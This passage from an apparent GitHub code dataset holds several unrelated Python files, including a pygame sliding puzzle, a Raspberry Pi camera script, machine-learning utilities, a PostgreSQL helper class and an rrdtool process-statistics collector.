true is start randomizer() which shuffle tiles during 80 seconds.\n self.randomizer()\n self.draw_tiles()\n self.randomizer_timer += 1\n if self.randomizer_timer > 80:\n self.start_randomize = False\n self.start_game = True\n self.movement_count = 0\n pygame.display.flip()\n\n def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Allows user to quit game\n pygame.quit()\n quit(0)\n if event.type == pygame.KEYDOWN: # User press a key arrow and empty tile is moved, by using move_tiles()\n if event.key in [pygame.K_LEFT, pygame.K_RIGHT, pygame.K_UP, pygame.K_DOWN]:\n self.moved = self.move_tiles(event.key)\n if self.moved:\n self.draw_tiles()\n self.movement_count += 1\n\n # Get mouse position, and exchange the clicked tile with the empty one\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n for row, tiles in enumerate(self.tiles):\n for col, tile in enumerate(tiles):\n if tile.click(mouse_x, mouse_y):\n if tile.right() and self.tiles_grid[row][col + 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][\n col + 1], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.left() and self.tiles_grid[row][col - 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][\n col - 1], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.up() and self.tiles_grid[row - 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][\n col], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.down() and self.tiles_grid[row + 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][\n col], self.tiles_grid[row][col]\n self.movement_count += 1\n self.draw_tiles()\n\n global GAMESIZE # import this variable so that user can modify grid size when press tile size buttons\n for button in self.button_list: # Check if a button is clicked, then activate booleans\n if button.click(mouse_x, mouse_y):\n if button.text == \"Randomize\":\n self.randomizer_timer = 0\n self.start_randomize = True\n\n # Change board size parameters\n if button.text == self.size[0]:\n GAMESIZE = 3\n self.changeboard_size = True\n if button.text == self.size[1]:\n GAMESIZE = 4\n self.changeboard_size = True\n if button.text == self.size[2]:\n GAMESIZE = 5\n self.changeboard_size = True\n\n\n# Create an object PuzzleGame class, which uses new and run functions\ngame = PuzzleGame()\nif __name__ == '__main__':\n game.new()\n game.run()\n","repo_name":"abraham-saindou/puzzle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8570921432","text":"from tkinter import *\n\n\ndef finish():\n root.destroy() # ручное закрытие окна и всего приложения\n print('Закрытие приложения')\n\n\nroot = Tk()\nroot.geometry('300x200')\n\nroot.title('Привет мир')\nroot.protocol(\"WM_DELETE_WINDOW\", finish)\n\nroot.mainloop()\n","repo_name":"Nikpell/Python","sub_path":"PqQt/pythonProject/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28710176711","text":"#!/usr/bin/env python3\n\nfrom picamera import PiCamera\nfrom time import sleep\nimport datetime\nimport os\nfrom gpiozero import LED\nimport csv\n\n\n#### GET THE MOST RECENT VALUE FROM THE LIGHTLUX CSV FILE ####\ndef readCSV():\n\tcsvFile = 'lightlux.csv'\n\twith open(csvFile) as f:\n\t\tcsv_reader = csv.reader(f, delimiter=',')\n\t\tlineCount =0\n\t\tfor row in f:\n\t\t\tlineCount +=1\n\twith open(csvFile) as d:\n\t\tcsv_reader = csv.reader(d, delimiter=',')\n\t\tlineCount2 = 0\n\t\tfor row in d:\n\t\t\tlineCount2 +=1\n\t\t\tif lineCount2 == lineCount:\n\t\t\t\trow = row.split(',')\n\t\t\t\tlightVal = row[1]\n\t\t\t\t#print(row)\n\t\treturn lightVal\nlightVal = int(readCSV())\n########################\nled1 = LED(23)\nled2 = LED(24)\nled1.on()\nled2.on()\ncamera = PiCamera()\n#### READ THE LIGHTLUX CSV AND IF THE VALUE IS 0, THEN INITIATE NIGHT MODE ####\nif lightVal ==0:\n\tcamera.start_preview()\n\tsleep(2)\n\tnow = datetime.datetime.now()\n\tdir = \"images/%s\" % now.strftime(\"%Y-%m-%d\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tcamera.ISO = 100\n\tgains = (8,8)\n\tcamera.awb_mode = 'off'\n\tcamera.awb_gains = gains\n\tcamera.capture('%s/%s.png' % (dir, now.strftime(\"%H:%M:%S\")))\n\n\n#### IF THE LIGHTLUX CSV VALUE IS GREATER THAN 0, INITIATE AUTOMATIC CAMERA SETTINGS ####\nif lightVal >0:\n\tcamera.start_preview()\n\tsleep(2)\n\tnow = datetime.datetime.now()\n\tdir = \"images/%s\" % now.strftime(\"%Y-%m-%d\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tgains2 = (0.74,1.18)\n\tcamera.awb_mode = 'off'\n\tcamera.awb_gains = gains2\n\tcamera.capture('%s/%s.png' % (dir, now.strftime(\"%H:%M:%S\")))\n\n\ncamera.stop_preview()\nled1.off()\nled2.off()\n","repo_name":"AutomatedFieldPhenomics/Local-Temperature-Measurements","sub_path":"captureNightToo.py","file_name":"captureNightToo.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24094693460","text":"#Write a program that prompts the user to enter a file name, reads the contents of the file and prints it to the screen.\n\nfileName = input(\"Please enter a file name \")+ \".txt\"\n\ndef main(x):\n fh = open(fileName, 'r')\n contents = fh.read()\n fh.close()\n print(contents)\n\n\nmain(fileName)\n","repo_name":"joshwestbury/Digital_Crafts","sub_path":"python_exercises/py_part4_ex/I_O/1_ex.py","file_name":"1_ex.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40798681630","text":"# Задайте словарь из n элементов, где ключ = n, а значение = (1 + 1/n)^n и выведите на\n# экран. Пример: Для n = 6: {1: 4, 2: 7, 3: 10, 4: 13, 5: 16, 6: 19}\nn = int(input('Введите n элеменетов словаря: '))\ndictionary = {}\nprint(dictionary)\n\nfor i in range(1,n+1):\n dictionary[i] = round((1 + 1/n)**n,3)\n n += 1\nprint(dictionary)\n","repo_name":"EvgeniyMastyukov/Pythone_Seminar2","sub_path":"Task_17_Dom.py","file_name":"Task_17_Dom.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25492422842","text":"smallest = 0\nint(smallest)\nlargest = 0\nint(largest)\nwhile True:\n\tnum = input(\"Please input a number: \")\n\tint(num)\n\tprint(type(num))\n\t# type(smallest)\n\t# if num < smallest:\n\t#\tsmallest = num\n\t#if num > largest:\n\t#\tlargest = num\nprint(\"Smallest:\",smallest)\nprint(\"largest:\"),largest\n","repo_name":"woleywa/python_for_everybody","sub_path":"1_class/Week7/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23437429615","text":"\"\"\"\nutility functions for the camouflage experiments\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\nimport numpy as np\nfrom sklearn.metrics.pairwise import rbf_kernel\nimport os\nimport math\n\n\ndef select_instances(X, Y, indices):\n \"\"\"\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of floats, the target values\n :param inidces: numpy 1D array of ints, the indices to extract\n \"\"\"\n return X[indices], Y[indices]\n\n\ndef unpickle(file):\n \"\"\"\n load the file\n :param file: string, path to the file\n :return dict(string, object): the dictionary loaded from file\n \"\"\"\n import pickle\n with open(file, 'rb') as fo:\n data_dict = pickle.load(fo, encoding='latin1')\n return data_dict\n\n\ndef scale_features(cover_X, val_X, test_X):\n \"\"\"\n scale the cover data to 0 and 1, apply the same transformation to the\n validation and test data\n :param cover_X: numpy 2D array of floats, the feature vectors for the\n cover data\n :param val_X: numpy 2D array of floats, the feature vectors for the\n validation data\n :param test_X: numpy 2D array of floats, the feature vectors for the\n test data\n :return numpy 2D array of floats, the scaled features of the cover data\n numpy 2D array of floats, the scaled features of the val data\n numpy 2D array of floats, the scaled features of the test data\n \"\"\"\n '''\n dim_mins, dim_maxs = np.amin(cover_X, axis=0), np.amax(cover_X, axis=0)\n diffs = dim_maxs - dim_mins\n\n apply_transformation = lambda X, dim_mins, diffs: (X - dim_mins) / diffs\n\n return\n apply_transformation(cover_X, dim_mins, diffs),\n apply_transformation(val_X, dim_mins, diffs),\n apply_transformation(test_X, dim_mins, diffs)\n '''\n norms = np.sum(cover_X**2, axis=0)\n norms = np.sqrt(norms)\n apply_transformation = lambda X, square_sums: X / square_sums\n\n return apply_transformation(cover_X, norms), \\\n apply_transformation(val_X, norms), \\\n apply_transformation(test_X, norms)\n\n\ndef load_dataset(input_dir):\n \"\"\"\n load dataset from a given directory\n :param input_dir: string, path to the input dir\n :return numpy 2D array of floats, the feature vectors for the cover data\n numpy 1D array of floats, the target values for the cover data\n numpy 2D array of floats, the feature vectors for the val data\n numpy 1D array of floats, the target values for the val data\n numpy 2D array of floats, the feature vectors for the test data\n numpy 1D array of floats, the target values for the test data\n numpy 2D array of floats, the kernel matrix for the cover data\n \"\"\"\n # load the features\n cover_fname = os.path.join(input_dir, 'cover.npz')\n val_fname = os.path.join(input_dir, 'val.npz')\n test_fname = os.path.join(input_dir, 'test.npz')\n cover_data, val_data, test_data = \\\n np.load(cover_fname), np.load(val_fname), np.load(test_fname)\n cover_X, cover_Y, val_X, val_Y, test_X, test_Y = \\\n cover_data['X'], cover_data['Y'], val_data['X'], val_data['Y'], \\\n test_data['X'], test_data['Y']\n\n # load the kernel matrix\n kernel_fname = os.path.join(input_dir, 'kernel.npy')\n kernel_matrix = np.load(kernel_fname)\n return cover_X, cover_Y, val_X, val_Y, test_X, test_Y, kernel_matrix\n\n\ndef load_data(input_fname):\n \"\"\"\n load the dataset\n :param input_fname: string, path to npz file containing the dataset\n :return numpy 2D array of floats, the feautre vectors\n numpy 1D array of flotas, the corresponding target values\n \"\"\"\n data = np.load(input_fname)\n return data['X'], data['Y']\n\n\ndef get_median_distance(X):\n \"\"\"\n get the median distance between all pairs of points\n :param X: numpy 2D array of floats, the feature vectors\n :return float, the median distance\n \"\"\"\n num_instances = len(X)\n num_distances = num_instances * (num_instances - 1) // 2\n distance_array = np.zeros(num_distances)\n distance_index = 0\n\n for i in range(num_instances):\n for j in range(num_instances):\n if i < j:\n distance_array[distance_index] = np.linalg.norm(X[i] - X[j])\n distance_index += 1\n\n distance_array = np.sort(distance_array)\n return distance_array[num_distances // 2] # return the median\n\n\ndef get_max_distance(X):\n \"\"\"\n get the maximum distance between point pairs\n :param X: numpy 2D array of floats, the feature vectors\n :return float, the maximum distnace\n \"\"\"\n max_dist = 0\n num_instances = len(X)\n\n for i in range(num_instances):\n for j in range(num_instances):\n if i < j:\n dist = np.linalg.norm(X[i] - X[j])\n if dist > max_dist:\n max_dist = dist\n\n return max_dist\n\n\ndef max_class_distance(X, Y):\n \"\"\"\n get the maximum distance between point pairs within the same class\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the target values\n :return float, the maximum distance\n \"\"\"\n pos_X, neg_X = [], []\n\n for index, y in enumerate(Y):\n if y == 1:\n pos_X.append(X[index])\n else:\n neg_X.append(X[index])\n\n pos_dist = get_max_distance(X)\n neg_dist = get_max_distance(X)\n\n if pos_dist > neg_dist:\n return pos_dist\n else:\n return neg_dist\n\n\ndef generate_kernel_matrix(X, Y, include_Y=True):\n \"\"\"\n generate kernel matrix, chooses the bandwidth dynamically\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the target values\n :param include_Y: boolean, if True then add a scaled version of the target\n in features for kernel calculation, default True\n :return numpy 2D array of floats, the kernel matrix\n \"\"\"\n sigma = get_median_distance(X)\n gamma = 1 / (2 * sigma**2)\n\n # include Y in kernel matrix\n if include_Y:\n max_class_dist = max_class_distance(X, Y)\n\n # set labels to either 0 or max_class_dist\n tempY = np.zeros(len(Y))\n for index, y in enumerate(Y):\n if y == 1:\n tempY[index] = max_class_dist\n kernel_X = np.hstack((X, tempY.reshape(-1, 1)))\n\n return rbf_kernel(kernel_X, gamma=gamma)\n\n # ignore Y in kernel matrix\n\n\ndef create_folds(X, Y, num_folds):\n \"\"\"\n create folds for cross validation\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the corresponding labels\n :param num_folds: int, number of folds\n :return list(numpy 2D array of floats), the folds for feature vectors\n list(numpy 1D array of ints), the corresponding labels\n \"\"\"\n size = len(X)\n assert(size == len(Y))\n fold_size = math.ceil(size / num_folds)\n\n indices = np.array(range(size))\n np.random.shuffle(indices)\n\n fold_X, fold_Y = [], []\n\n for i in range(num_folds):\n start_index = i * fold_size\n end_index = (i + 1) * fold_size\n\n if end_index > size:\n end_index = size\n\n fold_indices = indices[start_index: end_index]\n fold_X.append(X[fold_indices])\n fold_Y.append(Y[fold_indices])\n\n return fold_X, fold_Y\n\n\ndef create_train_test_set_from_folds(fold_X, fold_Y):\n \"\"\"\n :param fold_X: list(numpy 2D array of floats), the folds for feature\n vectors\n :param fold_Y: list(numpy 1D array of ints), the corresponding labels\n :return list(numpy 2D array of floats), the list of training sets\n list(numpy 1D array of ints), corresponding list of labels\n list(numpy 2D array of floats), the list of test sets\n list(numpy 1D array of ints), corresponding list of labels\n \"\"\"\n num_folds = len(fold_X)\n assert(num_folds == len(fold_Y))\n\n train_Xs, train_Ys, test_Xs, test_Ys = [], [], [], []\n\n for i in range(num_folds):\n test_X, test_Y = fold_X[i], fold_Y[i]\n\n train_X, train_Y = None, None\n for j in range(num_folds):\n if i == j:\n continue\n\n if train_X is None:\n train_X = fold_X[j]\n train_Y = fold_Y[j]\n else:\n train_X = np.vstack((train_X, fold_X[j]))\n train_Y = np.concatenate((train_Y, fold_Y[j]))\n\n train_Xs.append(train_X)\n train_Ys.append(train_Y)\n test_Xs.append(test_X)\n test_Ys.append(test_Y)\n\n return train_Xs, train_Ys, test_Xs, test_Ys\n","repo_name":"ayonsn017/TrainingSetCamouflage","sub_path":"code/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41112279141","text":"import tensorflow as tf\r\nimport tensorflow.keras as keras\r\n\r\n\r\nclass DisparityComputation(keras.Model):\r\n \"\"\"\r\n Compute disparity using Soft ArgMin.\r\n \"\"\"\r\n def __init__(self, max_disp):\r\n super(DisparityComputation, self).__init__()\r\n self.max_disp = max_disp\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n # inputs: [N, H, W, D], D = 2 * max_disp\r\n assert inputs.shape[-1] == 2 * self.max_disp\r\n\r\n disp_candidates = tf.linspace(-1.0 * self.max_disp, 1.0 * self.max_disp - 1.0, 2 * self.max_disp)\r\n prob_volume = tf.math.softmax(-1.0 * inputs, -1)\r\n disparity = tf.reduce_sum(disp_candidates * prob_volume, -1, True)\r\n\r\n return disparity # [N, H, W, 1]\r\n","repo_name":"Sheng029/HMSM-Net","sub_path":"US3D/StereoNet/computation.py","file_name":"computation.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"25562521725","text":"from __future__ import absolute_import\n\nimport re\n\nimport psycopg2.extensions\nimport psycopg2.extras\n\nfrom libtart.helpers import singleton\nfrom libtart.collections import OrderedCaseInsensitiveDict\n\n# These are not necessary with Python 3.\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODE)\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)\n\ndebug = False\n\n@singleton\nclass connection(psycopg2.extensions.connection):\n \"\"\"The purpose of the class is to add practical functions to the connection class on the psycopg2 library.\n Unlike the parent class autocommit enabled by default, disabled on demand.\"\"\"\n\n def __init__(self, dsn=''):\n psycopg2.extensions.connection.__init__(self, dsn)\n self.set_client_encoding('utf8')\n self.autocommit = True\n psycopg2.extras.register_hstore(self)\n self.__registerCompositeTypes()\n\n def __registerCompositeTypes(self):\n for row in self.__execute('''\nSelect typname\n from pg_type\n where typcategory = 'C'\n and (typnamespace in (select oid\n from pg_namespace\n where nspname !~ 'pg_*'\n and nspname != 'information_schema')\n or typname = 'record')'''):\n psycopg2.extras.register_composite(str(row['typname']), self, factory=OrderedCaseInsensitiveDictComposite)\n\n def __enter__(self):\n self.autocommit = False\n return psycopg2.extensions.connection.__enter__(self)\n\n def __exit__(self, *args):\n psycopg2.extensions.connection.__exit__(self, *args)\n self.autocommit = True\n\n def cursor(self, *args, **kwargs):\n kwargs.setdefault('cursor_factory', OrderedCaseInsensitiveDictCursor)\n return psycopg2.extensions.connection.cursor(self, *args, **kwargs)\n\n def __execute(self, query, parameters=[], table=True):\n \"\"\"Execute a query on the database; return None, the value of the cell, the values in the row in\n a dictionary or the values of the rows in a list of dictionary.\"\"\"\n\n with self.cursor() as cursor:\n if debug:\n print('QUERY: ' + str(cursor.mogrify(query, list(parameters))))\n\n try:\n cursor.execute(query, list(parameters))\n except psycopg2.ProgrammingError as error:\n raise ProgrammingError(error)\n except psycopg2.IntegrityError as error:\n raise IntegrityError(error)\n\n if table:\n if cursor.rowcount > 0:\n return cursor.fetchall()\n\n return []\n\n if cursor.rowcount == 0:\n raise NoRow('Query does not return any rows.')\n\n if cursor.rowcount > 1:\n raise MoreThanOneRow('Query returned more than one row.')\n\n if len(cursor.description) == 1:\n for cell in cursor.fetchone().values():\n return cell\n\n if len(cursor.description) > 1:\n return cursor.fetchone()\n\n def call(self, functionName, parameters=[], table=False):\n \"\"\"Call a function inside the database with the given arguments.\"\"\"\n\n query = 'Select * from ' + functionName + '('\n if isinstance(parameters, dict):\n query += ', '.join(k + ' := %s' for k in parameters.keys())\n parameters = parameters.values()\n elif isinstance(parameters, list) or isinstance(parameters, tuple):\n query += ', '.join(['%s'] * len(parameters))\n elif parameters is None:\n parameters = []\n else:\n query += '%s'\n parameters = [parameters]\n query += ')'\n\n return self.__execute(query, parameters, table)\n\n def callTable(self, *args):\n return self.call(*args, table=True)\n\n def select(self, tableName, where={}, orderBy=None, limit=None, offset=None, table=True):\n \"\"\"Execute a select query from a single table.\"\"\"\n\n query = 'Select * from ' + tableName + self.whereClause(where)\n if orderBy:\n if isinstance(orderBy, tuple):\n query += ' order by ' + ', '.join(orderBy)\n else:\n query += ' order by ' + str(orderBy)\n if limit:\n query += ' limit ' + str(limit)\n if offset:\n query += ' offset ' + str(offset)\n\n return self.__execute(query, where.values(), table)\n\n def selectOne(self, *args, **kwargs):\n return self.select(*args, table=False, **kwargs)\n\n def exists(self, tableName, where={}):\n \"\"\"Execute a select exists() query for a single table.\"\"\"\n\n query = 'Select exists(select 1 from ' + tableName + self.whereClause(where) + ')'\n return self.__execute(query, where.values(), False)\n\n def insert(self, tableName, values):\n \"\"\"Execute an insert one row or several rows to a single table.\"\"\"\n\n if isinstance(values, dict):\n columns = values.keys()\n values = (values,)\n else:\n columns = set(k.lower() for n in values for k in n.keys())\n\n query = 'Insert into ' + tableName + ' (' + ', '.join(columns) + ') values '\n query += ', '.join('(' + ', '.join('%s' if c in v else 'default' for c in columns) + ')' for v in values)\n query += ' returning *'\n\n return self.__execute(query, [v[c] for v in values for c in columns if c in v], len(values) > 1)\n\n def insertIfNotExists(self, tableName, values):\n \"\"\"Execute an insert into select query to insert a single row to a single table.\"\"\"\n\n query = 'Insert into ' + tableName + ' (' + ', '.join(values.keys()) + ')'\n query += ' select ' + ', '.join('%s' for v in values)\n query += ' where not exists(select 1 from ' + tableName + self.whereClause(values) + ')'\n query += ' returning *'\n\n try:\n return self.__execute(query, list(values.values()) * 2, False)\n except NoRow:\n return None\n\n def update(self, tableName, setColumns, where={}, table=True):\n \"\"\"Execute an update for a single table.\"\"\"\n\n assert setColumns\n query = 'Update ' + tableName + ' set ' + ', '.join(k + ' = %s' for k in setColumns.keys())\n query += self.whereClause(where) + ' returning *'\n\n return self.__execute(query, list(setColumns.values()) + list(where.values()), table)\n\n def updateOne(self, *args, **kwargs):\n return self.update(*args, table=False, **kwargs)\n\n def upsert(self, tableName, setColumns, where={}):\n try:\n return self.updateOne(tableName, setColumns, where)\n except NoRow:\n return self.insert(tableName, OrderedCaseInsensitiveDict(list(setColumns.items()) + list(where.items())))\n\n def delete(self, tableName, where={}, table=True):\n \"\"\"Execute a delete for a single table.\"\"\"\n\n query = 'Delete from ' + tableName + self.whereClause(where)\n query += ' returning *'\n\n return self.__execute(query, where.values(), table)\n\n def deleteOne(self, *args, **kwargs):\n return self.delete(*args, table=False, **kwargs)\n\n def whereClause(self, conditions):\n query = ''\n for key, value in conditions.items():\n if not query:\n query += ' where'\n else:\n query += ' and'\n query += ' ' + key\n if isinstance(value, dict):\n query += ' @> %s'\n elif isinstance(value, list):\n query += ' = any (%s)'\n elif value is None:\n query += ' is not distinct from %s'\n else:\n query += ' = %s'\n return query\n\n def truncate(self, tableName):\n \"\"\"Execute a truncate.\"\"\"\n\n return self.__execute('Truncate ' + tableName, [], True)\n\nclass OrderedCaseInsensitiveDictCursor(psycopg2.extras.RealDictCursor):\n def __init__(self, *args, **kwargs):\n kwargs['row_factory'] = OrderedCaseInsensitiveDictRow\n super(psycopg2.extras.RealDictCursor, self).__init__(*args, **kwargs)\n self._prefetch = 0\n\n\nclass OrderedCaseInsensitiveDictRow(psycopg2.extras.RealDictRow, OrderedCaseInsensitiveDict):\n \"\"\"Inspired by the structure on the psycopg2 library.\n See: https://github.com/psycopg/psycopg2/blob/master/lib/extras.py\n \"\"\"\n\n def __init__(self, cursor):\n OrderedCaseInsensitiveDict.__init__(self)\n\n # Required for named cursors\n if cursor.description and not cursor.column_mapping:\n cursor._build_index()\n self._column_mapping = cursor.column_mapping\n\n def __setitem__(self, name, value):\n if type(name) == int:\n name = self._column_mapping[name]\n return OrderedCaseInsensitiveDict.__setitem__(self, name, value)\n\nclass OrderedCaseInsensitiveDictComposite(psycopg2.extras.CompositeCaster, OrderedCaseInsensitiveDict):\n def make(self, values):\n return OrderedCaseInsensitiveDict(zip(self.attnames, values))\n\nclass NoRow(Exception): pass\n\nclass MoreThanOneRow(Exception): pass\n\nclass PostgresError(Exception):\n def __init__(self, psycopgError):\n Exception.__init__(self, psycopgError.diag.message_primary)\n self.__psycopgError = psycopgError\n\n def details(self):\n return dict((attr, getattr(self.__psycopgError.diag, attr))\n for attr in dir(self.__psycopgError.diag)\n if not attr.startswith('__') and getattr(self.__psycopgError.diag, attr) is not None)\n\nclass ProgrammingError(PostgresError): pass\n\nclass IntegrityError(PostgresError): pass\n","repo_name":"tart/tart-mailer","sub_path":"libtart/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"40926647716","text":"import numpy as np\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\nimport funcs\nfrom normA import NormA\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom matplotlib.colors import LogNorm\ndef main():\n Options = {'POD': 'PODI','neural_network': True, 'feed_forward_net': True, 'segmented': False, 'per_mode': True, 'N_s': 180, 'm': 30,\n 'N_o': 40, 'x_axis_logged': False, 'No_segments': 20, 'layers': 1, 'chosen_sample': 'log space',\n 'neurons': 1, 'solver': 'adam', 'activation': 'identity', 'ffn_layers': 1, 'ffn_neurons': 16, 'ffn_solver': 'trainbr',\n 'custom_saveload': False, 'save_name': '', 'load_name': ''}\n MIN_NEURONS = 8\n MAX_NEURONS = 32\n MAX_LAYERS = 5\n neurons_arr = np.logspace(int(np.log2(MIN_NEURONS)), int(np.log2(MAX_NEURONS)),num=int(np.log2(MAX_NEURONS))-int(np.log2(MIN_NEURONS))+1, base=2, dtype=int)\n layers_arr = np.arange(1, MAX_LAYERS+1, 1)\n # freq_out = np.linspace(15,15+(Options['N_o']-1)*10, Options['N_o'])\n # freq_out = np.linspace(5, 105, N_o)\n freq_out = np.linspace(15, 5000, Options['N_o'])\n Options['freqout'] = freq_out\n\n\n y_lagr = load_lagrange(Options)\n\n print(layers_arr)\n print(neurons_arr)\n \n scores = np.zeros((len(layers_arr), len(neurons_arr)))\n for i, layers in enumerate(layers_arr):\n Options['ffn_layers'] = layers\n for j, neurons in enumerate(neurons_arr):\n Options['ffn_neurons'] = neurons\n normA_nn = NormA(Options)\n y_nn, _ = normA_nn.load()\n difference = lagr_nn_difference(y_lagr, y_nn, average=True)\n scores[i, j] = difference\n\n # scores = normalise_data(scores)\n # scores = 1- scores\n scores = 1/scores\n print(scores)\n savename = f'l{layers_arr[0]}tol{layers_arr[-1]}_n{neurons_arr[0]}ton{neurons_arr[-1]}_logspace'\n # plots.plot_heatmap_layers_neurons_ylog(layers_arr, neurons_arr, scores, savename)\n\n df = DataFrame(scores.T, index=neurons_arr,columns=layers_arr)\n sns.heatmap(df, cmap=plt.cm.BuPu,cbar=True, norm=LogNorm(),cbar_kws={'label':'Score'})\n plt.xlabel(\"No. of layers\")\n plt.ylabel(\"No. of neurons\")\n # plt.yscale('log',basey=2)\n plt.gca().invert_yaxis()\n plt.savefig(f'figures/heatmap_layers_neurons_{savename}.pdf')\n plt.savefig(f'figures/heatmap_layers_neurons_{savename}.eps')\n print(f'saved to figures/heatmap_layers_neurons_{savename}')\n plt.show()\n \n\n\ndef load_lagrange(Options):\n old_m = Options['m']\n Options['neural_network'] = False\n Options['m'] = 20\n normA_lagr = NormA(Options)\n y_lagr, _ = normA_lagr.load()\n Options['neural_network'] = True\n Options['m'] = old_m \n return y_lagr\n\n \ndef normalise_data(diff):\n return (diff - np.nanmin(diff)) / (np.nanmax(diff) - np.nanmin(diff))\n \n \ndef lagr_nn_difference(y1, y2, average=True):\n norm_diff_shields = np.zeros((3, y1[0].shape[0]))\n for i in range(3):\n diff = np.square(y1[i] - y2[i]) / np.nanmax(y1[i])\n norm_diff_shields[i, :]= diff.ravel()\n \n\n if average:\n ret = np.nanmean(norm_diff_shields, axis=None)\n else:\n ret = norm_diff_shields\n return ret\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YashSooriya/magnetoMechanicalSolver","sub_path":"NNpyPlots/plot_heatmap_normAdiff.py","file_name":"plot_heatmap_normAdiff.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72945705652","text":"import os\nimport rrdtool\n\nfrom components.common import *\n\nfrom templates.processes.index import index as OverviewPage\nfrom templates.processes.load import load as LoadAveragePage\nfrom templates.processes.forks import forks as ForkRatePage\n\n\n#\n# The file where we get our data from.\n#\nDATA_SOURCE = \"/proc/loadavg\"\n\n\nclass Processes(StatsComponent):\n \"\"\"Statistics for Process Creation and System Load Averages.\"\"\"\n def __init__(self):\n self.name = \"processes\"\n\n if not os.path.exists(DATA_SOURCE):\n fail(self.name, \"cannot find \\\"%s\\\".\" % DATA_SOURCE)\n raise StatsException(DATA_SOURCE + \" does not exist\")\n \n self.title = \"Processes\"\n self.description = \"system load average and process spawning rates\"\n\n self.data_dir = properties[\"data\"] + \"/\" + self.name\n self.database = self.data_dir + \"/processes.rrd\"\n self.graphs_dir = properties[\"output\"] + \"/\" + self.name\n\n if not os.path.exists(self.data_dir):\n os.makedirs(self.data_dir)\n\n if not os.path.exists(self.graphs_dir):\n os.makedirs(self.graphs_dir)\n os.mkdir(self.graphs_dir + \"/load\")\n os.mkdir(self.graphs_dir + \"/forks\")\n\n if not os.path.exists(self.database):\n #\n # Remember: all \"time\" values are expressed in seconds.\n #\n refresh = properties[\"refresh\"]\n heartbeat = refresh * 2\n rrdtool.create(self.database,\n \"--step\", \"%d\" % refresh,\n \"DS:avg_1min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:avg_5min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:avg_15min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:proc:DERIVE:%d:0:U\" % heartbeat,\n \"RRA:AVERAGE:0.5:1:%d\" % (86400 / refresh), # 1 day of 'refresh' averages\n \"RRA:AVERAGE:0.5:%d:672\" % (900 / refresh), # 7 days of 1/4 hour averages\n \"RRA:AVERAGE:0.5:%d:744\" % (3600 / refresh), # 31 days of 1 hour averages\n \"RRA:AVERAGE:0.5:%d:730\" % (43200 / refresh)) # 365 days of 1/2 day averages\n\n def info(self):\n \"\"\"Return some information about the component,\n as a tuple: (name, title, description)\"\"\"\n return (self.name, self.title, self.description)\n\n def update(self):\n \"\"\"Update the historical data.\"\"\"\n f = open(DATA_SOURCE, \"r\")\n data = f.readline().split()\n f.close()\n\n rrdtool.update(self.database,\n \"--template\", \"avg_1min:avg_5min:avg_15min:proc\",\n \"N:%s:%s:%s:%s\" % (data[0], data[1], data[2], data[4]))\n\n \n def make_graphs(self):\n \"\"\"Generate the daily, weekly and monthly graphics.\"\"\"\n height = str(properties[\"height\"])\n width = str(properties[\"width\"])\n refresh = properties[\"refresh\"]\n background = properties[\"background\"]\n border = properties[\"border\"]\n\n for interval in (\"1day\", \"1week\", \"1month\", \"1year\"):\n rrdtool.graph(\"%s/load/graph-%s.png\" % (self.graphs_dir, interval), \n \"--start\", \"-%s\" % interval,\n \"--end\", \"-%d\" % refresh, # because the last data point is still *unknown*\n \"--title\", \"running processes (load average)\",\n 